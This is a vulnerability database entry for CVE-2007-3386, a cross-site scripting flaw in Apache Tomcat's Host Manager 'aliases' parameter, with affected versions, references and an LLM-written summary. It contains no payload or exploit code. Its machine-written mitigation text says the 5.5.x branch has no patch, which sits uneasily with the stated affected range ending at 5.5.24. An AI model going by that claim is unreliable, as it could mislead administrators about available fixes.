CVE-2007-3386
Description
Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cross-site scripting (XSS) vulnerability in Apache Tomcat Host Manager Servlet allows arbitrary HTML/script injection via crafted requests to the aliases parameter.
Vulnerability
The Host Manager Servlet in Apache Tomcat versions 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 contains a cross-site scripting (XSS) vulnerability. The flaw occurs because the servlet does not properly filter data before displaying it, allowing an attacker to inject arbitrary HTML or web script via crafted requests, specifically using the aliases parameter in an html/add action [1][3].
Exploitation
An attacker can exploit this vulnerability by sending a specially crafted request to the Host Manager. The attack requires that a user (typically an administrator) is logged into the Host Manager and is tricked into clicking a malicious link or visiting a malicious page that triggers the crafted request. No authentication is required to send the request, but the victim must be authenticated to the Host Manager for the script to execute in their session [3].
Impact
Successful exploitation allows the attacker to execute arbitrary HTML and JavaScript in the victim's browser within the security context of the Host Manager application. This can lead to session hijacking, defacement, or theft of sensitive information, such as administrative credentials [3].
Mitigation
For Apache Tomcat 6.0.x, upgrade to version 6.0.14 or later, which fixes the vulnerability [3]. For Apache Tomcat 5.5.x, no official patch is available as the 5.5.x branch is no longer supported; users are advised to mitigate the risk by logging out of the Host Manager after each use and closing the browser session [3].
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
39cpe:2.3:a:apache:tomcat:5.5.0:*:*:*:*:*:*:*+ 38 more
- cpe:2.3:a:apache:tomcat:5.5.0:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.1:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.10:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.11:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.12:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.13:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.14:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.15:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.16:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.17:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.18:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.19:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.2:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.20:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.21:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.22:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.23:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.24:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.3:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.4:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.5:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.6:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.7:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.8:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:5.5.9:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.10:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.11:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.12:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.13:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.6:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.8:*:*:*:*:*:*:*
- cpe:2.3:a:apache:tomcat:6.0.9:*:*:*:*:*:*:*
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
31- tomcat.apache.org/security-6.htmlnvdPatch
- community.ca.com/blogs/casecurityresponseblog/archive/2009/01/23.aspxnvd
- h20000.www2.hp.com/bizsupport/TechSupport/Document.jspnvd
- h20000.www2.hp.com/bizsupport/TechSupport/Document.jspnvd
- jvn.jp/jp/JVN%2359851336/index.htmlnvd
- lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.htmlnvd
- osvdb.org/36417nvd
- secunia.com/advisories/26465nvd
- secunia.com/advisories/26898nvd
- secunia.com/advisories/27037nvd
- secunia.com/advisories/27267nvd
- secunia.com/advisories/27727nvd
- secunia.com/advisories/28317nvd
- secunia.com/advisories/33668nvd
- securityreason.com/securityalert/3010nvd
- securitytracker.com/idnvd
- support.ca.com/irj/portal/anonymous/phpsupcontentnvd
- www.debian.org/security/2008/dsa-1447nvd
- www.mandriva.com/security/advisoriesnvd
- www.redhat.com/support/errata/RHSA-2007-0871.htmlnvd
- www.securityfocus.com/archive/1/476448/100/0/threadednvd
- www.securityfocus.com/archive/1/500396/100/0/threadednvd
- www.securityfocus.com/archive/1/500412/100/0/threadednvd
- www.securityfocus.com/bid/25314nvd
- www.vupen.com/english/advisories/2007/2880nvd
- www.vupen.com/english/advisories/2007/3386nvd
- www.vupen.com/english/advisories/2007/3527nvd
- www.vupen.com/english/advisories/2009/0233nvd
- exchange.xforce.ibmcloud.com/vulnerabilities/36001nvd
- oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10077nvd
- www.redhat.com/archives/fedora-package-announce/2007-November/msg00525.htmlnvd
News mentions
0No linked articles in our index yet.